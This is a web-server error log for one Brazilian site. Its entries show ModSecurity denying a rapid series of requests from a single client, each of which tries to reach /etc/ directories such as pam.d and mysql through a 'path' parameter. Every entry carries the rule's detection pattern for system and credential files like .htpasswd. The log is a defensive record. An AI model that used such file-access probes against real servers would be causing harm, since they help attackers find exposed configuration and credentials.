[Fri Mar 20 07:37:33.609401 2026] [:error] [pid 31215:tid 140411683178240] [client 216.73.216.191:5564] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbQF0L0L-SsrnPo5kIQAAAsc"]
[Fri Mar 20 07:37:33.609489 2026] [:error] [pid 7893:tid 140411590858496] [client 216.73.216.191:62342] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbRCii7xarUs8iHZjZgAAAhI"]
[Fri Mar 20 07:37:33.611534 2026] [:error] [pid 9818:tid 140411733534464] [client 216.73.216.191:15636] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbV1pVZ5mVmJwsFMrlQAAAEE"]
[Fri Mar 20 07:37:33.613315 2026] [:error] [pid 31215:tid 140411540502272] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbAF0L0L-SsrnPo5kHgAAAtg"]
[Fri Mar 20 07:37:33.613368 2026] [:error] [pid 9818:tid 140411674785536] [client 216.73.216.191:25825] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbV1pVZ5mVmJwsFMrlwAAAEg"]
[Fri Mar 20 07:37:33.616566 2026] [:error] [pid 31215:tid 140411725141760] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbQF0L0L-SsrnPo5kIAAAAsI"]
[Fri Mar 20 07:37:33.618061 2026] [:error] [pid 31215:tid 140411616036608] [client 216.73.216.191:10941] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbQF0L0L-SsrnPo5kHwAAAs8"]
[Fri Mar 20 07:37:33.618381 2026] [:error] [pid 31215:tid 140411666392832] [client 216.73.216.191:20221] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbQF0L0L-SsrnPo5kIgAAAsk"]
[Fri Mar 20 07:37:33.771020 2026] [:error] [pid 31215:tid 140411658000128] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbQF0L0L-SsrnPo5kIwAAAso"]
[Fri Mar 20 07:37:33.859553 2026] [:error] [pid 31215:tid 140411574073088] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbQF0L0L-SsrnPo5kJAAAAtQ"]
[Fri Mar 20 07:37:33.972597 2026] [:error] [pid 31215:tid 140411632822016] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbQF0L0L-SsrnPo5kJQAAAs0"]
[Fri Mar 20 07:37:34.067291 2026] [:error] [pid 31215:tid 140411557287680] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbgF0L0L-SsrnPo5kJgAAAtY"]
[Fri Mar 20 07:37:34.179248 2026] [:error] [pid 31215:tid 140411649607424] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbgF0L0L-SsrnPo5kKAAAAss"]
[Fri Mar 20 07:37:34.270934 2026] [:error] [pid 31215:tid 140411674785536] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbgF0L0L-SsrnPo5kKQAAAsg"]
[Fri Mar 20 07:37:34.380063 2026] [:error] [pid 31215:tid 140411582465792] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbgF0L0L-SsrnPo5kKgAAAtM"]
[Fri Mar 20 07:37:34.466370 2026] [:error] [pid 31215:tid 140411548894976] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbgF0L0L-SsrnPo5kKwAAAtc"]
[Fri Mar 20 07:37:34.580056 2026] [:error] [pid 31215:tid 140411716749056] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/fail2ban"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbgF0L0L-SsrnPo5kLAAAAsM"]
[Fri Mar 20 07:37:34.667525 2026] [:error] [pid 31215:tid 140411741927168] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc5.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbgF0L0L-SsrnPo5kLQAAAsA"]
[Fri Mar 20 07:37:36.096285 2026] [:error] [pid 7235:tid 140411582465792] [client 216.73.216.191:55080] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jb_qxLDW4GITHUkTiNgAAARM"]
[Fri Mar 20 07:37:36.097363 2026] [:error] [pid 7893:tid 140411674785536] [client 216.73.216.191:26921] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbxCii7xarUs8iHZjawAAAgg"]
[Fri Mar 20 07:37:36.099826 2026] [:error] [pid 7893:tid 140411716749056] [client 216.73.216.191:62342] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbxCii7xarUs8iHZjaQAAAgM"]
[Fri Mar 20 07:37:36.102081 2026] [:error] [pid 9818:tid 140411599251200] [client 216.73.216.191:25825] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jb11pVZ5mVmJwsFMrnAAAAFE"]
[Fri Mar 20 07:37:36.102379 2026] [:error] [pid 9818:tid 140411741927168] [client 216.73.216.191:15636] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbl1pVZ5mVmJwsFMrmwAAAEA"]
[Fri Mar 20 07:37:36.102802 2026] [:error] [pid 31215:tid 140411599251200] [client 216.73.216.191:7303] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbgF0L0L-SsrnPo5kLgAAAtE"]
[Fri Mar 20 07:37:36.107685 2026] [:error] [pid 31215:tid 140411733534464] [client 216.73.216.191:20221] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbwF0L0L-SsrnPo5kLwAAAsE"]
[Fri Mar 20 07:37:36.109258 2026] [:error] [pid 31215:tid 140411699963648] [client 216.73.216.191:10941] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbwF0L0L-SsrnPo5kMAAAAsU"]
[Fri Mar 20 07:37:36.111160 2026] [:error] [pid 31215:tid 140411624429312] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcAF0L0L-SsrnPo5kMgAAAs4"]
[Fri Mar 20 07:37:36.112387 2026] [:error] [pid 31215:tid 140411607643904] [client 216.73.216.191:5564] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jbwF0L0L-SsrnPo5kMQAAAtA"]
[Fri Mar 20 07:37:36.285079 2026] [:error] [pid 31215:tid 140411683178240] [client 216.73.216.191:49374] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab0jcAF0L0L-SsrnPo5kNAAAAsc"]
